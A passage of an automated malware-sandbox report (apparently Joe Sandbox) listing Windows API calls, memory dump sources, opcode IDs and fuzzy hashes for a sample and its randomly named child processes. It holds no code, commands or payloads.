                                                              • Part of subcall function 00BDE2E8: SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
                                                              • Part of subcall function 00BDE2E8: GetWindowRect.USER32(?,?), ref: 00BDE3C9
                                                              • Part of subcall function 00BDE2E8: GetClientRect.USER32(?,?), ref: 00BDE3D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                            • SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
                                                            • GetLastError.KERNEL32(?), ref: 00BE0FF6
                                                              • Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BE0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00BDDA55,?), ref: 00BDE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BDDA55,?), ref: 00BDE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271

                                                            Execution Graph

                                                            Execution Coverage:7.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:4
                                                            Total number of Limit Nodes:0
                                                            execution_graph 7323 7ffd9becc56c 7325 7ffd9becc56f 7323->7325 7324 7ffd9becc6b6 QueryFullProcessImageNameA 7326 7ffd9becc714 7324->7326 7325->7324 7325->7325

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5X_H
                                                            • API String ID: 0-3241812158

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1866309334.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bec0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 294c77ad3b9098297149d05974670f6fd77183be8ee2355add871680e2ca8470
                                                            • Instruction ID: f7c8c829429c768fc2e5bdb9965249fe96ceb893ce704bc184dc1373c3e270b8
                                                            • Opcode Fuzzy Hash: 294c77ad3b9098297149d05974670f6fd77183be8ee2355add871680e2ca8470
                                                            • Instruction Fuzzy Hash: 7001BC34A0E38D9FE722DBA4886419C7FB0AF82701F5542E7C084CB2A2D9786A44C740
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8c0b7b05d168d165f0ee1370f97a5adf80ccb921a8eadba5c0cf223eeeed9a4
                                                            • Instruction ID: af1408247b04ecf8c5f83cbc2dfebd5c3d1fc2bf212f8c39e04cdcca6dc90067
                                                            • Opcode Fuzzy Hash: a8c0b7b05d168d165f0ee1370f97a5adf80ccb921a8eadba5c0cf223eeeed9a4
                                                            • Instruction Fuzzy Hash: E8E03061F1E81E5FF6B0A79880643B812D1FBA8B10F5643B2D40DD32A2DDAC2D028385
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 062050ae159345b8d7ac1e957ed2aa36a7aa5082830678db98d0f8cb635a4810
                                                            • Instruction ID: 51e9708e32eb7bac10d59372e9197d3a9776d1aaea5a9a83395f814e1d70c726
                                                            • Opcode Fuzzy Hash: 062050ae159345b8d7ac1e957ed2aa36a7aa5082830678db98d0f8cb635a4810
                                                            • Instruction Fuzzy Hash: AAE0ED21F1A91D5FE6B4A75C84693BC22D2FBEC700F524376D40DD32A2DD6C2D428785
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9400922c4504c5271fa936df56a9fe2eebf87d3a013539dd861304df71eee8a
                                                            • Instruction ID: 310ff8428f562e5057bf2a98428f6f2e8e53b6f83fb1ab5ca15871fccaa1aba0
                                                            • Opcode Fuzzy Hash: f9400922c4504c5271fa936df56a9fe2eebf87d3a013539dd861304df71eee8a
                                                            • Instruction Fuzzy Hash: 54F0B431B0964E8EE774DB64C4B46BD77F0EF94711F50427AD009C32E5DA786680CB45
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d81ea3abc4b5d0f2cd6ab186def54774a6909d607d2edd3d4a69e2c7ee01cd6e
                                                            • Instruction ID: 978465e5ce2c89b21227428091aeba7e600d2488689956c59386fb5f8455fd12
                                                            • Opcode Fuzzy Hash: d81ea3abc4b5d0f2cd6ab186def54774a6909d607d2edd3d4a69e2c7ee01cd6e
                                                            • Instruction Fuzzy Hash: F6E02621B1C84906EB7CBA7468B26B17280DB95724B0506B9E01EC22DACC4D1CC14381
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aa4c8d1bda0f7e8db51d007f3015530dedacfdebdf34ebb1a3aa182d9c740c5
                                                            • Instruction ID: 001275ffafd2fa88e3f64edad2b779b4b4cb8a32f99377d9c068830664bcfce8
                                                            • Opcode Fuzzy Hash: 4aa4c8d1bda0f7e8db51d007f3015530dedacfdebdf34ebb1a3aa182d9c740c5
                                                            • Instruction Fuzzy Hash: FDE04F21F0A82D1FE6B1A71880683A812D2FBA8B00F1143B2D40CD3262DD6829428780
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: cf40b1aaf93878febd25d3955ad5d99ca662de4784a2b51917a49fbe6e54aa08
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 33E0ED20F0901A4BFBB4A794D8647B962A1AFD4300F1241B4D80D932E2DDB86E818745
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: 24c312c5c4231feda41b8bd292561b98360c2acb7d8dee7cda6d2171dec40766
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: BAE0EC24F0A80E4FEFA4E7A480786B822D29FE4750F0A41B4D40DC71B2DDA8A9018700
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8974cfe7e02493159de27da9e18819952443e9b5c1a7f68d406fca6c3c14ca71
                                                            • Instruction ID: d8672fb132a5bb0cbea2143cbd48b7b93b7eb73c3f85e07f0941e10256806e61
                                                            • Opcode Fuzzy Hash: 8974cfe7e02493159de27da9e18819952443e9b5c1a7f68d406fca6c3c14ca71
                                                            • Instruction Fuzzy Hash: 4FC01210B5740D51D03473AEEC664ED7740EF88518FC64271E40D84096DC491587C196
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 5a7a21ac3f80e21b15f332d6c5c9e33e4dce99864514c66e350543c344b6f1c4
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 60C0123062A80E8FDA80BB28C889924BBA0FB4E201BDA00E4E00CC71A1DA5998908700
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 2e81c1da0b918a139826e1f3d2a9b4d61e8dded6c25d17f1babbac126a3091ec
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: D8C08C04F0F40F00F43073EE14360ACB1009BC4A10FD30332D00C800E19CDD22C5818E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e37cdc3615825068cff315a29f7d4d104bb4601dc22802fca50c847c084f6aa1
                                                            • Instruction ID: c187ee74ab688bac4a76afddc5a2e4610882d4efca8566c45e7386ce615e4fde
                                                            • Opcode Fuzzy Hash: e37cdc3615825068cff315a29f7d4d104bb4601dc22802fca50c847c084f6aa1
                                                            • Instruction Fuzzy Hash: 43C0E914F1A91D4AE9B4A3A440756FD11D19F95B00B560674A04DD71E2DD5C69408645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32d67519079df498516489f663c6b66fa9ce6fa7099d4db46eaefa5edeef4371
                                                            • Instruction ID: 4cda587f8beccc05917d532c4acc1d8c29118d5ed9b56069addfbada7dab9cd9
                                                            • Opcode Fuzzy Hash: 32d67519079df498516489f663c6b66fa9ce6fa7099d4db46eaefa5edeef4371
                                                            • Instruction Fuzzy Hash: E5C04C01F1CC2A07E65A66144C2567E04935F9472DFD502B4F41F872DFCD5D5D0207C6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 3081ca6566bc6c794f9a2d8f4748dfbef7a0c6ca5a8b3e32accbc2225c5f9fc5
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: F6B01200D5B44F00E43433FB086616870409BC4104FC20270D40CC019198CD129442C6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 7be111d0d1522463fa43b2e0b16bb4ab735d9b9aed14eecc4ff76e7f33d18cb8
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: EFB09201F0E12B56F1B003D4513927902E05FE4344F0B2738E85C861F2FDDCAE014045
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Z_H
                                                            • API String ID: 0-3267294416
                                                            • Opcode ID: 487002bb919c1b40a7ef0b486a4d0e101569877a3d782cceeeb08caa9fde9ebc
                                                            • Instruction ID: f0f78675580693079a701c66ae55d8f4cbc5020a35c1d83200c265424966256a
                                                            • Opcode Fuzzy Hash: 487002bb919c1b40a7ef0b486a4d0e101569877a3d782cceeeb08caa9fde9ebc
                                                            • Instruction Fuzzy Hash: 4C913572A19A9D4FE79ADF6888657A87FE5FF59310F0501BED059CB2E2CBB81410CB00
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e798280138f0c3dafa465e6faa706c205333fdc3c05c9640f96a92f55f9a12b
                                                            • Instruction ID: 73a2712b783edd667b7ab36974bbc81218fcb9218861f3e34cf7aecb7da3dd0f
                                                            • Opcode Fuzzy Hash: 2e798280138f0c3dafa465e6faa706c205333fdc3c05c9640f96a92f55f9a12b
                                                            • Instruction Fuzzy Hash: DEB12731A0864D8FDB58EF68C865AF97BE0FF1A311F0541BBE45DC71A2DA74A841CB81
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fc877b6dc4659d4d50e9d2919b31b904161a2694ddf5574928ce0186537395b
                                                            • Instruction ID: 9fdd233f504693134e36ebb00589a5213171175cfe405ae223140c6f289cc91f
                                                            • Opcode Fuzzy Hash: 1fc877b6dc4659d4d50e9d2919b31b904161a2694ddf5574928ce0186537395b
                                                            • Instruction Fuzzy Hash: 75413B22B0D6690FE328B7BCA4AA5F97B80DF59339B1405FFD45ECB1E7CD1868418285
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a65fe2ac71bff45dfef9d1cef16a87feef161a5b94f5e07b4c71005ce4b596a8
                                                            • Instruction ID: d90a01e8ef80cc7f8a99cb3dd715587fc8e1cfa7119df68d3c141b79a80c5335
                                                            • Opcode Fuzzy Hash: a65fe2ac71bff45dfef9d1cef16a87feef161a5b94f5e07b4c71005ce4b596a8
                                                            • Instruction Fuzzy Hash: 09314721B0D6291BE328B7BC646A5F977C1CF59376F1405FAE41EC71E7CC18AC414285
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ffe0fa9930b1ac67c1929093f50f9c353a8b7991890f7e9f7561f8cd817b60d
                                                            • Instruction ID: 7eac7acd4024840a01e7cb3f8bb24596412d53c739230734d0aa2f4fe7420aca
                                                            • Opcode Fuzzy Hash: 3ffe0fa9930b1ac67c1929093f50f9c353a8b7991890f7e9f7561f8cd817b60d
                                                            • Instruction Fuzzy Hash: FE215920B1E95D0FE758BB6C84AA6BA7BC2DF99320F1400BDE41EC32F6CC58AC414785
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: c50439c9e3e918529bb3cf3507dfeaa44115ff89df06e05b6d55bfc490ffebef
                                                            • Instruction ID: a7dfc7030cbeb26cb87158363876917d0ebb53fc50b97226be1576a703b569de
                                                            • Opcode Fuzzy Hash: c50439c9e3e918529bb3cf3507dfeaa44115ff89df06e05b6d55bfc490ffebef
                                                            • Instruction Fuzzy Hash: 27910572A19A894FE7698B68C8257A97FE1FF95314F4201BED049C73E2CBB41811C750
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca96a97f3a5f0317c5ab8653d4bd07877aacdf3ebe9c7c22295f0981950305b2
                                                            • Instruction ID: c64d8c02f08c089273663706e606182d6a5dd3684398e4a1e9f46a3c7c482989
                                                            • Opcode Fuzzy Hash: ca96a97f3a5f0317c5ab8653d4bd07877aacdf3ebe9c7c22295f0981950305b2
                                                            • Instruction Fuzzy Hash: E1B15730A0D68D8FDB58EF68C8656E97BE1FF16310F0401BBD44DCB1A2CA78A945CB90
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 195e5591aa858c473bde3643d18146f4edd08be03ac7e96a1d5a1d827cc18028
                                                            • Instruction ID: 8f78d5f98a0c81a212b39524d319b35ed2376cd97e413df6035041ccfe1231a6
                                                            • Opcode Fuzzy Hash: 195e5591aa858c473bde3643d18146f4edd08be03ac7e96a1d5a1d827cc18028
                                                            • Instruction Fuzzy Hash: F1414912B0C5590FE318F7BCA4A5AF87781EF5933AB0505BBE44ECB1E7CD14A841C294
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d2ccb33ce94b7a43330d81922567f5312811962f060bf8055697f359bd637da
                                                            • Instruction ID: 2cb95e721b01d0360bea984f8aff102a7eccac06968c7219b71a2fc1e12dcca1
                                                            • Opcode Fuzzy Hash: 0d2ccb33ce94b7a43330d81922567f5312811962f060bf8055697f359bd637da
                                                            • Instruction Fuzzy Hash: E6312711B0C9190FF368BB6CA46AAF533C2DF5933AB1505BBE40EC72E7CD18AC418294
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 619413d2a7e08a08c3f2356fdff1597c2d87fdc13d8bceadd7cd498b6bb96015
                                                            • Instruction ID: 840742275d4f1ca7787b1e61e5c50b3abea66f5deed18acaaa4bef5824c12f35
                                                            • Opcode Fuzzy Hash: 619413d2a7e08a08c3f2356fdff1597c2d87fdc13d8bceadd7cd498b6bb96015
                                                            • Instruction Fuzzy Hash: 79214520B1890D0FF798BB6C946967A37C3EF99321F0204B9E80EC33F6DD54AC018291
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction ID: b529cb0d5a020165a2589cebfe80e937c2cc09a4da923f78c2308a07ce0e9d70
                                                            • Opcode Fuzzy Hash: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
